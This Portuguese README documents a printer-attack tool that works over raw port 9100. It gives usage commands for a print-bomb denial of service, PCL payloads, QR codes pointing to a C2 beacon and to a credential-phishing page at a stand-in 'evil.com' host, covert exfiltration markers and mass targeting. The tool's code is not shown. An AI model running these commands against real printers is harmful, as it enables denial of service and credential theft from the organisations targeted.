
Framework de exploração de impressoras para testes de segurança via porta bruta 9100, com entrega de payloads PCL, bombardeio DoS, códigos QR de C2, códigos QR de phishing e marcadores de exfiltração encoberta.
____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - Estrutura de Ataque de Spooling de Impressoras
Explorando o vetor de ataque negligenciado: Suas Impressoras de Rede
Desenvolvido por: Azhari Ramadhan 🔥
PrintHack é uma ferramenta sofisticada de exploração de impressoras projetada para profissionais de segurança, red teamers e testadores de penetração. Esta ferramenta aproveita o protocolo bruto de spooling de impressoras (Porta 9100) para realizar avaliações de segurança, testar vulnerabilidades de impressoras e simular cenários de ataque do mundo real.
⚠️ AVISO: Esta ferramenta destina-se exclusivamente a testes de segurança legítimos e fins educacionais. Use com responsabilidade e apenas em sistemas que você possui ou para os quais possui autorização explícita para testar.
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - Processamento de imagensqrcode - Geração de QR codesrequests - Requisições HTTPpip install Pillow qrcode requests
# Testar conectividade da impressora
python3 printerhack.py -t 192.168.1.100 --check
# Enviar página de teste
python3 printerhack.py -t 192.168.1.100 --test
# Imprimir mensagem personalizada
python3 printerhack.py -t 192.168.1.100 -m "Olá do Red Team!"
# Imprimir imagem a partir de URL (convertida para ASCII)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# Enviar payload PCL
python3 printerhack.py -t 192.168.1.100 --pcl
# Bomba de impressão (DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# Imprimir QR code de callback C2
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# Imprimir QR code de phishing
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENTE: Verifique suas credenciais"
# Imprimir para múltiplas impressoras a partir de arquivo
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Mensagem de Teste de Segurança"
Imprimir mensagens ou instruções ocultas em impressoras comprometidas em cenários de acesso físico.
Imprimir QR codes que direcionam para páginas de coleta de credenciais disfarçadas de avisos de segurança.
Usar a saída da impressora como um canal oculto de exfiltração para dados codificados.
Testar a resiliência organizacional contra ataques de negação de serviço baseados em impressoras.
Enumeração e identificação de impressoras em toda a rede.
Indicadores de Detecção:
Estratégias de Mitigação:
ESTA FERRAMENTA É FORNECIDA "NO ESTADO EM QUE SE ENCONTRA" PARA TESTES DE SEGURANÇA LEGÍTIMOS APENAS.
O AUTOR NÃO É RESPONSÁVEL POR QUALQUER USO INDEVIDO DESTA FERRAMENTA.
SEMPRE obtenha autorização por escrito antes de testar qualquer sistema.
O uso não autorizado pode violar o Computer Fraud and Abuse Act (CFAA)
e leis semelhantes em sua jurisdição.
Desenvolvido por: Azhari Ramadhan
Contribuições são bem-vindas! Por favor, garanta:
Desenvolvedor: Azhari Ramadhan 🔥
Licença MIT - Consulte LICENSE para detalhes
🖨️ printerBOMB - Explorando a Última Linha de Defesa
Fique à frente dos atacantes pensando como eles
Feito com 🔥 por Azhari Ramadhan
| Recurso | Descrição |
|---|
--check | Testar conectividade da impressora |
--test | Enviar página de teste |
--message | Imprimir payloads personalizados |
--image | Imprimir imagem a partir de URL (arte ASCII) |
--pcl | Enviar payload formatado em PCL |
--bomb | Ataque DoS (payload massivo) |
--c2 | Imprimir QR code de callback C2 |
--phish | Imprimir QR code de phishing |
--exfil | Imprimir marcador de exfiltração de dados |
--file | Impressão em massa para múltiplos alvos |